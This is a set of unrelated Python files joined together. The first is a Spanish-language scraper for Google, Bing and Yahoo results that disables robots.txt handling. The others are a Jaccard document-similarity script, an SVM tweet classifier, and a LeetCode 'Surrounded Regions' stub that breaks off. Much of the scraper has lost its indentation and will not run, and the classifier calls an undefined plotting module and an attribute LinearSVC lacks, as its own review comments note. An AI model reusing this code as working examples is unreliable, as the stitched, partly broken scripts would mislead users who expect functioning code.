googlelink5 = _extract_line(principal, duno - 15)
googlelink6 = _extract_line(principal, duno - 14)
googlelink7 = _extract_line(principal, duno - 13)
googlelink8 = _extract_line(principal, duno - 12)
googlelink9 = _extract_line(principal, duno - 11)
googlelink10 = _extract_line(principal, duno - 10)
# Match the scratch state the original loops left behind.
google = ''
d0 = 0
d1=0
d2=0
d3=0
imgt=''
img=''
for y10 in principal:
if y10=='\n':
d0=d0+1
d1=0
d2=0
if img=='/images?':
googlelinkimg=imgt
d3=1
img=''
imgt=''
else:
img=''
imgt=''
if d0==1 and y10!='\n':
d1=d1+1
img=img+y10
if d1==7 and img=='/images':
imgt=imgt+img
if d1>=8:
d0=0
d2=1
if d2==1:
imgt=imgt+y10
if d3==1:
break
# Result slots for the first Google results page: 20 URLs, 20 titles, and
# 20 snippet texts, plus the individually named scratch variables the rest
# of the script refers to. All start empty.
googlepaginas = [''] * 20
googlepagina1 = googlepagina2 = googlepagina3 = googlepagina4 = googlepagina5 = ''
googlepagina6 = googlepagina7 = googlepagina8 = googlepagina9 = googlepagina10 = ''
googlepagina11 = googlepagina12 = googlepagina13 = googlepagina14 = googlepagina15 = ''
googlepagina16 = googlepagina17 = googlepagina18 = googlepagina19 = googlepagina20 = ''
googletitulos = [''] * 20
googletitulo1 = googletitulo2 = googletitulo3 = googletitulo4 = googletitulo5 = ''
googletitulo6 = googletitulo7 = googletitulo8 = googletitulo9 = googletitulo10 = ''
googletitulo11 = googletitulo12 = googletitulo13 = googletitulo14 = googletitulo15 = ''
googletitulo16 = googletitulo17 = googletitulo18 = googletitulo19 = googletitulo20 = ''
googletextos = [''] * 20
googletextosfin = [''] * 20
googletexto1 = googletexto2 = googletexto3 = googletexto4 = googletexto5 = ''
googletexto6 = googletexto7 = googletexto8 = googletexto9 = googletexto10 = ''
googletexto11 = googletexto12 = googletexto13 = googletexto14 = googletexto15 = ''
googletexto16 = googletexto17 = googletexto18 = googletexto19 = googletexto20 = ''
d = 0
filtro = ''
br.open("http://google.com"+googlelink1)
soup1 = BeautifulSoup(br.response().read())
for j,hit in enumerate(soup1.findAll(attrs={'class' : 'r'})):
try:
ch=str(hit.a)
comparador=''
cuenta=0
cuenta1=0
for jala in ch:
cuenta=cuenta+1
if jala=='h' and cuenta>4:
for jala1 in ch:
cuenta1=cuenta1+1
if cuenta1 >= cuenta and jala1!='&':
comparador=comparador+jala1
if jala1=='&':
sab1=len(jala1)
for x in range(1,(sab1+1)):
jala1=''
sab2=len(jala)
for x in range(1,(sab2+1)):
jala=''
sab3=len(ch)
for x in range(1,(sab3+1)):
ch=''
break
bender=0
fry=''
if comparador=='':
googlepaginas[d]='-'
d=d+1
for h in str(comparador):
bender=bender+1
fry=fry+h
if bender==4 and fry=='http':
googlepaginas[d]=str(comparador)
d=d+1
break
if bender==5:
googlepaginas[d]='-'
d=d+1
break
comparador=''
except:
pass
# Post-filter the extracted URLs: YouTube links (detected by their first 22
# characters) are replaced with '-', anything that survives 23 characters is
# kept, and placeholder '-' entries stay '-'.
harr=''
harr1=0
harr2=''
googlepaginasfin=['']*20
for i in range(0,20):
    harr=googlepaginas[i]
    for j in harr:
        harr2=harr2+j
        harr1=harr1+1
        if harr2=='http://www.youtube.com' and harr1==22:
            googlepaginasfin[i]='-'
            harr2=''
            harr1=0
            break
        if harr1==23:
            googlepaginasfin[i]=googlepaginas[i]
            harr2=''
            harr1=0
            break
        if harr2=='-':
            googlepaginasfin[i]='-'
            harr2=''
            harr1=0
            break
print googlepaginasfin[:]
# Extract each result title: walk the result markup backwards to the last
# '"', reverse it back, then keep the characters between '>' and '<'.
# Titles whose first 8 letters spell "imágene" (image-results rows) have
# their index appended to 'gab' for the snippet pass below.
tit=''
num=0
num1=0
tit1=''
tit2=''
control=0
salida=''
ermest=0
sapeo=0
gab=''
for hit in enumerate(soup1.findAll(attrs={'class' : 'r'})):
    try:
        for x in str(hit):
            tit=tit+x
            num=num+1
        # Collect characters from the end until the final '"' (reversed).
        for y in range(1,(num)):
            if tit[num-y]=='"':
                break
            else:
                tit1=tit1+tit[num-y]
                num1=num1+1
        # Reverse back into reading order.
        for z in range(1,num1):
            tit2=tit2+tit1[num1-z]
        may=tit2
        for a in may:
            if a=='>':
                control=1
            if a=='<':
                control=0
            if control==1 and a!='>':
                salida=salida+a
        pap=0
        guarda=''
        mmm=''
        qqq=unicode('imágene','utf-8')
        for go in salida:
            pap=pap+1
            guarda=guarda+go
            if pap==8:
                mmm=guarda.lower()
                nnn=unicode(mmm,'utf-8')
                if nnn==qqq:
                    gab=gab+str(ermest)
            if pap==9:
                break
        googletitulos[ermest]=str(salida)
        ermest=ermest+1
        num=0
        num1=0
        tit=''
        tit1=''
        tit2=''
        salida=''
    except:
        pass
print '\n'
print googletitulos[:]
print gab
# Extract the snippet text of each result (class 'st') by keeping characters
# between '>' and '<', then realign the snippets: for every image-row index
# recorded in 'gab', insert a '-' placeholder and shift the rest down one.
control1=0
salida1=''
branigan=0
for hit in enumerate(soup1.findAll(attrs={'class' : 'st'})):
    try:
        for c in str(hit):
            if c=='>':
                control1=1
            if c=='<':
                control1=0
            if control1==1 and c!='>' and c!='<' and c!=')':
                salida1=salida1+c
        googletextos[branigan]=str(salida1)
        branigan=branigan+1
        salida1=''
        control1=0
        zap=0
    except:
        pass
if gab=='':
    for o in range(0,20):
        googletextosfin[o]=googletextos[o]
else:
    for s in gab:
        for l in range(0,20):
            if googletextos[l]=='':
                break
            if int(l)<int(s):
                googletextosfin[l]=googletextos[l]
            if int(l)==int(s):
                googletextosfin[int(s)]='-'
                googletextosfin[int(s)+1]=googletextos[int(s)]
            if int(l)>int(s) :
                googletextosfin[l+1]=googletextos[int(l)]
print '\n'
print googletextosfin[:]
print '\n'
print 'BUSCANDO EN bing.......'+('\n'*3)
br.open( "http://bing.com" )
br.select_form( nr=0 )
br.form[ 'q' ] = obag
br.submit()
binghtml=''
inicio1=timeit.default_timer()
soup = BeautifulSoup(br.response().read())
for i,link in enumerate(soup.find_all('a')):
binghtml=binghtml+(str(link.get('href'))+'\n')
a=''
for mod in obag:
if mod==' ':
a=a+'+'
else:
a=a+mod
lin1='/search?q='+a+'&go=&qs=ds&lf=1&qpvt='+a
lin2='/search?q='+a+'&go=&qs=ds&first=11&FORM=PERE'
lin3='/search?q='+a+'&go=&qs=ds&first=21&FORM=PERE1'
lin4='/search?q='+a+'&go=&qs=ds&first=31&FORM=PERE2'
lin5='/search?q='+a+'&go=&qs=ds&first=41&FORM=PERE3'
lin6='/images/search?q='+a+'&FORM=HDRSC2'
bingpagina1=''
bingpagina2=''
bingpagina3=''
bingpagina4=''
bingpagina5=''
bingimagenes=''
euro=''
for lin in binghtml:
if lin=='\n':
if euro == lin1:
bingpagina1=euro
eouro=''
if euro == lin2:
bingpagina2=euro
eouro=''
if euro == lin3:
bingpagina3=euro
eouro=''
if euro == lin4:
bingpagina4=euro
eouro=''
if euro == lin5:
bingpagina5=euro
eouro=''
if euro == lin6:
bingimagenes=euro
eouro=''
else:
euro=''
else:
euro=euro+lin
# Open the first Bing results page and parse each organic result ("b_algo"):
# URL (between the 3rd and 4th double quote of the anchor markup), title
# (text between '>' and '<'), and snippet (node text).
bingpaginas=['']*20
bingtitulos=['']*20
bingtextos=['']*20
br.open('http://bing.com'+bingpagina1)
soup1 = BeautifulSoup(br.response().read())
relog=0
for link in soup1.findAll(attrs={'class' : "b_algo"}):
    try:
        man=str(link.a)
        bingcont=0
        bingpag=''
        for guf in man:
            if guf=='"':
                bingcont=bingcont+1
            if bingcont==3 and guf!='"':
                bingpag=bingpag+guf
            if bingcont==4:
                bingpaginas[relog]=bingpag
                break
        men=str(link.a)
        bingtitulo=''
        aut=0
        for guf in men:
            if guf=='>':
                aut=1
            if guf=='<':
                aut=0
            if aut==1 and guf!='>':
                bingtitulo=bingtitulo+guf
        bingtitulos[relog]=bingtitulo
        bingtextos[relog]=link.text
    except:
        pass
    relog=relog+1  # NOTE(review): advances even when parsing failed, leaving an empty slot
print bingpaginas
print '\n'
print bingtitulos
print '\n'
print bingtextos
#
print '\n'
print 'BUSCANDO EN YAHOO .........'+'\n'
# '+'-encode spaces in the query for the Yahoo search URL.
yahoob=''
for a in obag:
    if a==' ':
        yahoob=yahoob+'+'
    else:
        yahoob=yahoob+a
# Fresh browser session for Yahoo.
br=Browser()
br.set_handle_robots(False)
br.addheaders=[('User-agent','Chrome')]
br.open('https://espanol.search.yahoo.com/search?cs=bz&p='+yahoob+'&fr=fp-tts-706&fr2=ps&woeid=376229&fp=1')
br.submit  # NOTE(review): missing parentheses -- this does not call submit()
# Collect every href on the Yahoo results page, one per line.
yahoohtml=''
soupyahoo = BeautifulSoup(br.response().read())
for link in (soupyahoo.find_all('a')):
    yahoohtml=yahoohtml+(str(link.get('href'))+'\n')
acumulador=''
yahooenlace1=''
yahooenlace2=''
yahooenlace3=''
yahooenlace4=''
yahooenlace5=''
yahooimagenes=''
contyahoo=0
tot=0
# First pass: count the href lines; second pass: pick fixed positions (27 and
# 33 from the start; 9..6 lines from the end) as the image link and the five
# result-page links.
for mza0 in yahoohtml:
    if mza0=='\n':
        tot=tot+1
for mza in yahoohtml:
    if mza=='\n':
        contyahoo=contyahoo+1
        if contyahoo==27:
            yahooimagenes=acumulador
            acumulador=''
        if contyahoo==33:
            yahooenlace1=acumulador
            acumulador=''
        if contyahoo==(tot-9):
            yahooenlace2=acumulador
            acumulador=''
        if contyahoo==(tot-8):
            yahooenlace3=acumulador
            acumulador=''
        if contyahoo==(tot-7):
            yahooenlace4=acumulador
            acumulador=''
        if contyahoo==(tot-6):
            yahooenlace5=acumulador
            acumulador=''
        else:
            acumulador=''
    else:
        acumulador=acumulador+mza
# Parse the first Yahoo results page: each "yschttl spt" node yields a URL
# (text after the 5th double quote, kept only if it starts with "http") and a
# title (text between '>' and '<'). Video/image section headers mark their
# snippet slot with '-'.
yahoopaginas=['']*20
yahootitulos=['']*20
yahootextos=['']*20
br.open(str(yahooenlace1))
yahooex=''
yahoocont=0
yahoosalida=''
yahoosalida1=''
yahookey=0
mm=''
yahooguia=0
souphtml=BeautifulSoup(br.response().read())
for link in souphtml.findAll(attrs={'class' : "yschttl spt"}):
    yahooex=''
    yahooex=str(link)
    for y in yahooex:
        if y=='"':
            yahoocont=yahoocont+1
        if yahoocont==5 and y!='"':
            yahoosalida=yahoosalida+y
        if yahoocont==6:
            rat=0
            for m in yahoosalida:
                rat=rat+1
                mm=mm+m
                if rat==4 and mm=='http':
                    #print yahoosalida
                    yahoopaginas[yahooguia]=yahoosalida
                    break
                if rat==4 and mm!='http':
                    #print '-'
                    yahoopaginas[yahooguia]='-'
                    break
            yahoocont=0
            mm=''
            yahoosalida=''
            break
    for z in yahooex:
        if z=='>':
            yahookey=1
        if z=='<':
            yahookey=0
        if yahookey==1 and z!='>':
            yahoosalida1=yahoosalida1+z
    yahootitulos[yahooguia]=yahoosalida1
    # Detect "video search" / "image results" section headers by the text
    # after the first '-'.
    yh1=unicode(' Búsqueda de video ','utf-8')
    yh5=unicode(' Resultados de imágenes','utf-8')
    yh2=0
    yh3=''
    for yh in yahoosalida1:
        if yh=='-':
            yh2=1
        if yh2==1 and yh!='-':
            yh3=yh3+yh
    yh4=unicode(yh3,'utf-8')
    if yh4==yh1:
        yahootextos[yahooguia]='-'
    if yh4==yh5:
        yahootextos[yahooguia]='-'
    yahoosalida1=''
    yahookey=0
    yahooguia=yahooguia+1
print '\n'
print yahoopaginas
print '\n'
print yahootitulos
print '\n'
# Scrape the result abstracts (snippet texts) and slot them into yahootextos,
# skipping positions previously marked '-' (video/image pseudo-results).
yahoosalidatexto=''
textokey=0
yahootextsalida=''
yahoopaso=0
for link in souphtml.findAll(attrs={'class' : "abstr"}):
    yahoosalidatexto=str(link)
    # Strip tags: keep only characters between '>' and '<'.
    for x in yahoosalidatexto:
        if x=='>':
            textokey=1
        if x=='<':
            textokey=0
        if textokey==1 and x!='>':
            yahootextsalida=yahootextsalida+x
    if yahootextos[yahoopaso]=='-':
        yahootextos[yahoopaso+1]=yahootextsalida
        yahoopaso=yahoopaso+1
    else:
        yahootextos[yahoopaso]=yahootextsalida
    textokey=0
    yahoosalidatexto=''
    yahootextsalida=''
    yahoopaso=yahoopaso+1
print yahootextos
# Report total elapsed time and wait for the user before exiting.
fin=timeit.default_timer()
tiempototal= fin-inicio1
print '___________________________________________________________'
print 'TIEMPO TOTAL TRANSCURRIDO: %.3f'%tiempototal,'[SEGUNDOS]'
raw_input('ENTER PARA SALIR')
|
import string
import nltk
nltk.download('stopwords')
nltk.download('wordnet')
nltk.download('punkt')
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
# Shared lemmatizer used by preprocess().
lemmatizer = WordNetLemmatizer()
# Query document and the corpus it is matched against.
base_document = "This is an example sentence for the document to be compared"
documents = ["This is the collection of documents to be compared against the base_document"]
def preprocess(text):
    """Normalize *text* into a list of lemmatized tokens.

    Pipeline: lowercase -> tokenize -> drop English stopwords, punctuation
    tokens and single-character tokens -> WordNet-lemmatize the survivors.
    Lemmatizing (rather than stemming) preserves word structure so acronyms
    are less likely to collide.
    """
    lowered = text.lower()
    stop_words = set(stopwords.words('english'))
    tokens = word_tokenize(lowered)
    return [
        lemmatizer.lemmatize(tok)
        for tok in tokens
        if tok not in stop_words
        and tok not in string.punctuation
        and len(tok) > 1
    ]
def calculate_jaccard(word_tokens1, word_tokens2):
    """Return the Jaccard similarity of two token lists.

    Jaccard(A, B) = |A & B| / |A | B| over the token *sets*.

    Args:
        word_tokens1: first sequence of tokens.
        word_tokens2: second sequence of tokens.

    Returns:
        float in [0, 1]. Returns 0.0 when both inputs are empty — the naive
        formula would raise ZeroDivisionError in that case.
    """
    set1 = set(word_tokens1)
    set2 = set(word_tokens2)
    union = set1 | set2
    if not union:
        # Both token lists empty: define similarity as 0.0 instead of crashing.
        return 0.0
    intersection = set1 & set2
    return len(intersection) / len(union)
def process_jaccard_similarity():
    """Print the document in *documents* most similar to *base_document*.

    Tokenizes everything with preprocess(), scores each candidate with
    calculate_jaccard(), and reports the best match (ties keep the earliest
    document, matching a strict '<' comparison).
    """
    base_tokens = preprocess(base_document)

    # Token lists for every candidate document.
    all_tokens = []
    for idx, doc in enumerate(documents):
        all_tokens.append(preprocess(doc))
        print("making word tokens at index:", idx)

    all_scores = [calculate_jaccard(base_tokens, toks) for toks in all_tokens]

    best_score = 0
    best_index = 0
    for idx, score in enumerate(all_scores):
        if best_score < score:
            best_score = score
            best_index = idx

    most_similar_document = documents[best_index]
    print("Most similar document by Jaccard with the score:", most_similar_document, best_score)


process_jaccard_similarity()
|
# -*- coding: utf-8 -*-
#Tweet classifier using SVM
#Boyang Zhang and Jason Lucibello
import nltk
import numpy as np
#this might be a challenge to install
#from mayavi import mlab
from numpy import exp,arange
from pylab import meshgrid,cm,imshow,contour,clabel,colorbar,axis,title,show
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import axes3d, Axes3D
from sklearn import svm, grid_search
from sklearn.datasets import make_moons
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_selection import SelectFwe
from sklearn.feature_extraction import DictVectorizer
from sklearn.cross_validation import train_test_split
from sklearn.metrics import classification_report
import random, re, collections, itertools
from matplotlib import cm, mlab
from sklearn import svm, datasets
from matplotlib.ticker import LinearLocator, FormatStrFormatter
from scipy.sparse import coo_matrix
# Label space for the three-way tweet classification task and its
# human-readable class names (index-aligned).
sentiments = [1 ,2, 3]
target_names = ["Self", "Another Person", "General Statement"]
# Shared feature vectorizer / label encoder used by the helpers below.
dv = DictVectorizer()
le = LabelEncoder()
def removeNonAscii(s):
    """Return *s* with every character outside the 7-bit ASCII range removed."""
    kept = [ch for ch in s if ord(ch) < 128]
    return "".join(kept)
def plot_coo_matrix(m):
    """Create a fresh figure with a 3D axis for visualizing sparse matrix *m*.

    Coerces *m* to COO format first and returns the 3D Axes object (the
    matrix itself is not drawn here).
    """
    if not isinstance(m, coo_matrix):
        m = coo_matrix(m)
    fig = plt.figure()
    return fig.gca(projection='3d')
def parse_labeled_data(filename):
    """Read alternating tweet/label lines from *filename* and return a
    deduplicated, class-balanced list of (tweet, label) pairs.

    Side effects: rewrites ../training_data/ordered_tweets.txt with the
    deduplicated tweets and writes any duplicates to duplicates.txt.
    """
    #variable setup
    ones, twos, threes, tweets_and_labels = ([] for i in range(4))
    tweet, label = '', ''
    i = 1
    newFile = open('../training_data/ordered_tweets.txt', 'w')
    dup = open('duplicates.txt', 'w')
    with open(filename, 'r') as f:
        for line in f:
            # '###' lines are file comments; skip them.
            if line.startswith('###'):
                continue
            line = line.rstrip('\n')
            #removeNonAscii(line)
            #print line
            if i % 2 == 1:
                # Odd lines are tweets: anonymize @mentions, strip leading
                # whitespace and drop the '#' from hashtags.
                line = re.sub('@[^\s]+','USER',line)
                line = re.sub("^\s+","", line)
                line = re.sub(r'#([^\s]+)', r'\1', line)
                #line = re.sub(r'''(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'".,<>?«»“”‘’]))''','',line)
                tweet = line
            else:
                # Even lines carry the integer label (1, 2 or anything-else=3).
                l = int(line)
                if l == 1:
                    ones.append((tweet, l))
                elif l == 2:
                    twos.append((tweet, l))
                else:
                    threes.append((tweet, 3))
            i = i + 1
    # Record duplicates before deduplicating.
    duplicates = []
    duplicates.extend(ones)
    duplicates.extend(twos)
    duplicates.extend(threes)
    dup.write(str([x for x, y in collections.Counter(duplicates).items() if y > 1]))
    #remove duplicates
    ones = list(set(ones))
    twos = list(set(twos))
    threes = list(set(threes))
    # Persist the deduplicated tweets back to disk in tweet/label line pairs.
    for item, val in ones:
        newFile.write(item + "\n")
        newFile.write(str(val) + "\n")
    for item, val in twos:
        newFile.write(item + "\n")
        newFile.write(str(val) + "\n")
    for item, val in threes:
        newFile.write(item + "\n")
        newFile.write(str(val) + "\n")
    newFile.close()
    # Balance classes by trimming each to the smallest class size.
    smallest = min([len(l) for l in [ones, twos, threes]])
    print 'we have ' + str(len(ones)) + ' tweets labeled with a 1'
    print 'we have ' + str(len(twos)) + ' tweets labeled with a 2'
    print 'we have ' + str(len(threes)) + ' tweets labeled with a 3'
    print 'smallest list is of size' + str(smallest)
    #shuffling
    #random.shuffle(ones)
    #random.shuffle(twos)
    #random.shuffle(threes)
    #trimming
    ones = ones[:smallest]
    twos = twos[:smallest]
    threes = threes[:smallest]
    #concatenating
    tweets_and_labels.extend(ones)
    tweets_and_labels.extend(twos)
    tweets_and_labels.extend(threes)
    #random.shuffle(tweets_and_labels)
    return tweets_and_labels
def normalize(tweet):
    """Strip '.', '-' and ',' from *tweet*, tokenize, and lowercase the tokens.

    Bug fix: str.replace returns a new string; the original call discarded
    the result, so the punctuation was never actually removed.
    """
    # get rid of certain punctuation chars
    symbols_to_eliminate = ['.', '-', ',']
    for symbol in symbols_to_eliminate:
        tweet = tweet.replace(symbol, '')
    toks = nltk.word_tokenize(tweet)
    # only take words - things with lowercase letters
    toks = [w.lower() for w in toks]
    return toks
def ngrams(iterable, n=1):
    """Yield every contiguous slice of length *n* from *iterable*.

    Bug fix: the original condition was ``idx + n < l``, which silently
    dropped the final n-gram (e.g. the last unigram of every tweet).
    """
    l = len(iterable)
    for idx in range(l):
        if idx + n <= l:
            yield iterable[idx:idx+n]
#returns all n grams in toks
def ngram_features(toks, n=1):
    """Binary presence features for every k-gram of *toks*, for k = 1..n.

    Keys are the str() of each k-gram; every present gram maps to 1.
    """
    feats = {}
    for size in range(1, n + 1):
        for gram in ngrams(toks, size):
            feats[str(gram)] = 1
    #print n_dict
    return feats
def get_features(data):
    """Vectorize raw tweets into a sparse feature matrix.

    Each tweet is normalized, turned into 1- and 2-gram presence features,
    and the dicts are fit/transformed by the module-level DictVectorizer ``dv``.
    """
    feature_dicts = []
    for tweet in data:
        tokens = normalize(tweet)
        feature_dicts.append(ngram_features(tokens, 2))
    return dv.fit_transform(feature_dicts)
def get_x_y(data):
    """Split (tweet, label) pairs into encoded targets Y and feature matrix X."""
    le.fit(sentiments)
    #print data
    # d[1] is the integer label, d[0] the tweet text.
    Y = le.transform([d[1] for d in data])
    X = get_features([d[0] for d in data])
    print "Y, X SIZE", len(Y)
    return Y, X
def min_sparse(X):
    """Minimum value of sparse matrix *X*, counting implicit zeros.

    Returns 0 for a matrix with no stored values; otherwise the minimum of
    the stored data, clamped to at most 0 when implicit zeros exist.
    """
    if len(X.data) == 0:
        return 0
    stored_min = X.data.min()
    if X.getnnz() == X.size:
        # Fully stored: the stored minimum is the true minimum.
        return stored_min
    return min(stored_min, 0)
def print_top_features(vectorizer, clf, class_labels):
    """Prints features with the highest coefficient values, per class"""
    names = vectorizer.get_feature_names()
    for idx, label in enumerate(class_labels):
        # Indices of the 20 largest coefficients for this class.
        strongest = np.argsort(clf.coef_[idx])[-20:]
        top_words = " ".join(names[j] for j in strongest)
        print("%s: %s" % (label, top_words))
    print("\n")
# --- Script entry: load data, train a linear SVM, report accuracy ---
filename = "../training_data/ordered_tweets_no_duplicates.txt"
tweets_and_labels = parse_labeled_data(filename)
#print tweets_and_labels
#random.shuffle(tweets_and_labels)
Y, X = get_x_y(tweets_and_labels)
#X, Y = make_moons(noise=0.3, random_state=0)
#print X, Y
#print nX[0], nY[0]
#splitting training and test set
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.20, random_state=42)
#C = regularization parameter (keeps from overfitting): C is the degree of penalty (L1 or L2) (powers of 10)
#penalty sparse = l2 lowers angle so that no unigram can be super weighted, l1 removes features to shift the curve
#TODO: separate into train test eval
# Family-wise error rate feature selection (applied after the baseline run).
fs = SelectFwe(alpha=700.0)
print "Before", x_train.shape
clf = svm.LinearSVC(C=100, penalty='l2', dual = False)
clf.fit(x_train, y_train)
# Baseline: train/test reports without feature selection.
print "NO FEATURE SELECTION"
print "Training Accuracy"
print clf.decision_function(x_train)
print (classification_report(y_train, clf.predict(x_train), target_names=target_names))
print "Testing Accuracy"
print (classification_report(y_test, clf.predict(x_test), target_names=target_names))
# Re-train on the reduced feature set.
x_train = fs.fit_transform(x_train, y_train)
print "After", x_train.shape
clf.fit(x_train, y_train)
'''
w = clf.coef_
print w
a = np.array(w[0].todense(), dtype=np.float)
b = np.array(w[1].todense(), dtype=np.float)
c = -100*a/b
print a, b, c
xx = np.linspace(-5, 5)
yy = c * xx - clf.intercept_[0] / b
# get the separating hyperplane using weighted classes
wclf = svm.SVC(kernel='linear', class_weight={1: 10})
wclf.fit(x_train, y_train)
ww = wclf.coef_[0]
wa = -ww[0] / ww[1]
wyy = wa * xx - wclf.intercept_[0] / ww[1]
# plot separating hyperplanes and samples
h0 = pl.plot(xx, yy, 'k-', label='no weights')
h1 = pl.plot(xx, wyy, 'k--', label='with weights')
pl.scatter(X[:, 0], X[:, 1], c=y, cmap=pl.cm.Paired)
pl.legend()
pl.axis('tight')
pl.show()
'''
'''# the function that I'm going to plot
def z_func(x,y):
return (1-(x**2+y**3))*exp(-(x**2+y**2)/2)
x = arange(-3.0,3.0,0.1)
y = arange(-3.0,3.0,0.1)
X,Y = meshgrid(x, y) # grid of point
Z = z_func(X, Y) # evaluation of the function on the grid
im = imshow(Z,cmap=cm.RdBu) # drawing the function
# adding the Contour lines with labels
cset = contour(Z,arange(-1,1.5,0.2),linewidths=2,cmap=cm.Set2)
clabel(cset,inline=True,fmt='%1.1f',fontsize=10)
colorbar(im) # adding the colobar on the right
# latex fashion title
title('$z=(1-x^2+y^3) e^{-(x^2+y^2)/2}$')
show()
fig = plt.figure()
ax = fig.gca(projection='3d')
surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1,
cmap=cm.RdBu,linewidth=0, antialiased=False)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
'''
'''
clf.fit(x_train, y_train)
w = clf.coef_.todense()
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
X, Y, Z = axes3d.get_test_data(0.05)
cset = ax.contour(X, Y, Z, 16, extend3d=True)
ax.clabel(cset, fontsize=9, inline=1)
plt.show()
'''
#print_top_features(dv, clf, target_names)
#m = coo_matrix(w)
#print m
#ax = plot_coo_matrix(m)
#ax.figure.show()
# get the separating hyperplane
print "WWWWWWWW", np.array(clf.coef_)
w = np.array(clf.coef_)
print "TESTING", w[:,0]
print np.min(w[:,0])
print clf.intercept_[0]
#print clf.get_params(True)
# Slope of the separating line per class: -w0 / w1.
a = np.divide(-w[:,0], w[:,1])
print a.shape
xx = np.linspace(-5, 5)
print xx.shape, clf.intercept_[0], #clf.support_vectors_
# NOTE(review): np.dot of shape-(3,) `a` with shape-(50,) `xx` looks like a
# shape mismatch — presumably elementwise `a * xx` broadcasting was intended.
yy = np.dot(a, xx) - np.divide(clf.intercept_[0] ,w[:,1])
print yy
# plot the parallels to the separating hyperplane that pass through the
# support vectors
# NOTE(review): LinearSVC does not expose support_vectors_ — these lines
# would raise AttributeError; leftover from an SVC experiment, it seems.
b = clf.support_vectors_[0]
yy_down = a * xx + (b[1] - a * b[0])
b = clf.support_vectors_[-1]
yy_up = a * xx + (b[1] - a * b[0])
# plot the line, the points, and the nearest vectors to the plane
# NOTE(review): `pl` is never imported (only pylab functions and plt are) —
# these calls would raise NameError.
pl.plot(xx, yy, 'k-')
pl.plot(xx, yy_down, 'k--')
pl.plot(xx, yy_up, 'k--')
pl.scatter(clf.support_vectors_[:, 0], clf.support_vectors_[:, 1],
           s=80, facecolors='none')
pl.scatter(X[:, 0], X[:, 1], c=Y, cmap=pl.cm.Paired)
pl.axis('tight')
pl.show()
print "Training Accuracy"
#print clf.decision_function(x_train)
print (classification_report(y_train, clf.predict(x_train), target_names=target_names))
# Apply the same feature selection to the test set before evaluating.
x_test = fs.transform(x_test)
print "Testing Accuracy"
print (classification_report(y_test, clf.predict(x_test), target_names=target_names))
# Per-class decision values for each test sample (one column per class).
decisions = clf.decision_function(x_test)
print "DECISION", decisions.shape[1]
#print y_test
X = np.array(decisions[:,0])
#print X
Y = np.array(decisions[:,2])
Z = np.array(decisions[:,1])
points = []
for i, val in enumerate(X):
    #print X[i], Y[i], Z[i]
    points.append((X[i], Y[i], Z[i]))
points = list(set(points))
print points, len(points)
#print X, Y, Z
# Map each true label to a matplotlib color/marker pair for plotting.
new_y = []
print "Y_TEST", len(y_test)
for i, val in enumerate(y_test):
    if val == 2:
        val = 'b'
        mark = 'o'
    elif val == 1:
        val = 'r'
        mark = '+'
    else:
        val = 'g'
        mark = '^'
    #print new_y
    new_y.append((val, mark))
#print new_y
#print np.array(X)
'''
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for i, val in enumerate(np.array(X)):
ax.scatter3D(X[i], Y[i], Z[i], c=new_y[i][0], marker=new_y[i][1])
ax.set_xlabel('Self')
ax.set_ylabel('General Disease')
ax.set_zlabel('Another Person')
ax.set_autoscale_on(True)
plt.show()
'''
# 2D scatter of decision values (Self vs Another Person), skipping class 'b'.
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for i, val in enumerate(np.array(X)):
    print val
    if new_y[i][0] != 'b':
        ax2.scatter(X[i], Z[i], c=new_y[i][0], marker=new_y[i][1])
ax2.set_xlabel('Self')
ax2.set_ylabel('Another Person')
ax2.set_autoscale_on(True)
plt.show()
'''
# Define the points in 3D space
# including color code based on Z coordinate.
pts = mlab.points3d(X, Y, Z, Z)
# Triangulate based on X, Y with Delaunay 2D algorithm.
# Save resulting triangulation.
mesh = mlab.pipeline.delaunay2d(pts)
# Remove the point representation from the plot
pts.remove()
# Draw a surface based on the triangulation
surf = mlab.pipeline.surface(mesh)
# Simple plot.
mlab.xlabel("x")
mlab.ylabel("y")
mlab.zlabel("z")
mlab.show()
'''
'''h = .02 # step size in the mesh
# we create an instance of SVM and fit out data. We do not scale our
# data since we want to plot the support vectors
C = 1.0 # SVM regularization parameter
#svc = svm.SVC(kernel='linear', C=C).fit(X, Y)
rbf_svc = svm.SVC(kernel='rbf', gamma=0.7, C=C).fit(X, Y)
poly_svc = svm.SVC(kernel='poly', degree=3, C=C).fit(X, Y)
lin_svc = svm.LinearSVC(C=C).fit(X, Y)
# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
# title for the plots
titles = ['SVC with linear kernel',
'SVC with RBF kernel',
'SVC with polynomial (degree 3) kernel',
'LinearSVC (linear kernel)']
for i, clf in enumerate((svc, rbf_svc, poly_svc, lin_svc)):
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
pl.subplot(2, 2, i + 1)
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
pl.contourf(xx, yy, Z, cmap=pl.cm.Paired)
pl.axis('off')
# Plot also the training points
pl.scatter(X[:, 0], X[:, 1], c=Y, cmap=pl.cm.Paired)
pl.title(titles[i])
pl.show()
''' |
#130. Surrounded Regions
'''
Given a 2D board containing 'X' and 'O' (the letter O), capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's into 'X's in that surrounded region.
For example,
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
'''
#BFS, Union Find
class Solution(object):
    def solve(self, board):
        """
